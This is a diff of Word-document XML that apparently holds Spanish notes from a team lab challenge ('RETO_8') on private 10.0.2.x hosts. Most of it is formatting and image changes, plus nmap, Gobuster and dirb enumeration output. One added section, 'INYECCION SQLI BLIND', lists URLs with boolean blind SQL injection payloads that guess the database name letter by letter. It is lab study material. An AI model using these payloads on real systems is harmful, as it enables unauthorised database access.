+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:softHyphen/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4F1B7A3F" wp14:editId="6C2DB4DA">
+            <wp:extent cx="4975860" cy="8892540"/>
+            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
+            <wp:docPr id="435434900" name="Imagen 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="435434900" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId16"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="4975860" cy="8892540"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="60FC26B1" wp14:editId="446550C2">
+            <wp:extent cx="5010849" cy="7592485"/>
+            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
+            <wp:docPr id="456966046" name="Imagen 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="456966046" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId17"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5010849" cy="7592485"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t>INYECCION SQLI BLIND</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:hyperlink r:id="rId18" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hipervnculo"/>
+          </w:rPr>
+          <w:t>http://10.0.2.21/admin/edit.php?id=1%20AND%20SUBSTRING((SELECT%20database()),%201,%201)%20=%20%27b%27--</w:t>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>la b</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> (primera letra)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:hyperlink r:id="rId19" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hipervnculo"/>
+          </w:rPr>
+          <w:t>http://10.0.2.21/admin/edit.php?id=1%20AND%20SUBSTRING((SELECT%20database()),%202,%201)%20=%20%27l%27--</w:t>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>la L (segunda letra)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:hyperlink r:id="rId20" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hipervnculo"/>
+          </w:rPr>
+          <w:t>http://10.0.2.21/admin/edit.php?id=1%20AND%20SUBSTRING((SELECT%20database()),%203,%201)%20=%20%27o%27--</w:t>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>LA o 3 LETRA</w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -1450,13 +1855,6 @@
     <w:p/>
     <w:p/>
     <w:p/>
-    <w:p/>
-    <w:p/>
-    <w:p/>
-    <w:p/>
-    <w:p/>
-    <w:p/>
-    <w:p/>
     <w:p>
       <w:r>
         <w:t>EJECUTO SCRIPT DE PYTHON BUSCANDO ALGO EN LAS PRIMERAS ID DE LA WEB Y NADA</w:t>
@@ -1899,7 +2297,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId11"/>
+                    <a:blip r:embed="rId21"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -1954,7 +2352,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId12"/>
+                    <a:blip r:embed="rId22"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -2002,7 +2400,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId13"/>
+                    <a:blip r:embed="rId23"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -2045,7 +2443,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId14"/>
+                    <a:blip r:embed="rId24"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -2087,7 +2485,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId15"/>
+                    <a:blip r:embed="rId25"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -2131,7 +2529,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId16"/>
+                    <a:blip r:embed="rId26"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -2173,7 +2571,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId17"/>
+                    <a:blip r:embed="rId27"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -2218,7 +2616,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId18"/>
+                    <a:blip r:embed="rId28"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -2261,7 +2659,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId19"/>
+                    <a:blip r:embed="rId29"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -2306,7 +2704,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId20"/>
+                    <a:blip r:embed="rId30"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -2843,7 +3241,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId21"/>
+                    <a:blip r:embed="rId31"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -2903,7 +3301,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId22"/>
+                    <a:blip r:embed="rId32"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -5434,7 +5832,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId23"/>
+                    <a:blip r:embed="rId33"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -5531,7 +5929,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId24"/>
+                    <a:blip r:embed="rId34"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -5595,7 +5993,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId25"/>
+                    <a:blip r:embed="rId35"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -5682,7 +6080,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId26"/>
+                    <a:blip r:embed="rId36"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -5726,7 +6124,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId27"/>
+                    <a:blip r:embed="rId37"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -6565,6 +6963,29 @@
     <w:basedOn w:val="Fuentedeprrafopredeter"/>
     <w:rsid w:val="00F91DEA"/>
   </w:style>
+  <w:style w:type="character" w:styleId="Hipervnculo">
+    <w:name w:val="Hyperlink"/>
+    <w:basedOn w:val="Fuentedeprrafopredeter"/>
+    <w:uiPriority w:val="99"/>
+    <w:unhideWhenUsed/>
+    <w:rsid w:val="00665A22"/>
+    <w:rPr>
+      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
+      <w:u w:val="single"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="character" w:styleId="Mencinsinresolver">
+    <w:name w:val="Unresolved Mention"/>
+    <w:basedOn w:val="Fuentedeprrafopredeter"/>
+    <w:uiPriority w:val="99"/>
+    <w:semiHidden/>
+    <w:unhideWhenUsed/>
+    <w:rsid w:val="00665A22"/>
+    <w:rPr>
+      <w:color w:val="605E5C"/>
+      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
+    </w:rPr>
+  </w:style>
 </w:styles>
 </file>
 

--- a/GENERAL_TEAM_CHALLENGES/RETO_8/fingerprint.docx
+++ b/GENERAL_TEAM_CHALLENGES/RETO_8/fingerprint.docx
@@ -195,17 +195,17 @@
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
           <w:b/>
           <w:bCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
         <w:lastRenderedPageBreak/>
         <w:t>1.- Se comprueba con nmap toda la información posible del objetico</w:t>
@@ -269,19 +269,39 @@
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
           <w:b/>
           <w:bCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>2.- Se consulta con Gobuster y dirb las carpetas accesibles:</w:t>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">2.- Se consulta con Gobuster y </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>dirb las</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> carpetas accesibles:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -416,18 +436,19 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
+        <w:spacing w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>By The Dark Raver</w:t>
@@ -435,18 +456,19 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
+        <w:spacing w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>-----------------</w:t>
@@ -454,28 +476,30 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
+        <w:spacing w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>START_TIME: Wed Jul 24 04:29:05 2024</w:t>
@@ -483,18 +507,19 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
+        <w:spacing w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>URL_BASE: http://10.0.2.20/</w:t>
@@ -502,47 +527,70 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
+        <w:spacing w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>WORDLIST_FILES: /</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>usr</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>/share/dirb/wordlists/common.txt</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>-----------------</w:t>
@@ -550,77 +598,82 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
+        <w:spacing w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">GENERATED WORDS: 4612                                                          </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t xml:space="preserve">GENERATED WORDS: 4612                                                          </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
         <w:t>---- Scanning URL: http://10.0.2.20/ ----</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
+        <w:spacing w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t xml:space="preserve">==&gt; DIRECTORY: http://10.0.2.20/admin/                                                                          </w:t>
@@ -628,18 +681,19 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
+        <w:spacing w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t xml:space="preserve">+ http://10.0.2.20/all (CODE:200|SIZE:644)                                                                      </w:t>
@@ -647,18 +701,19 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
+        <w:spacing w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
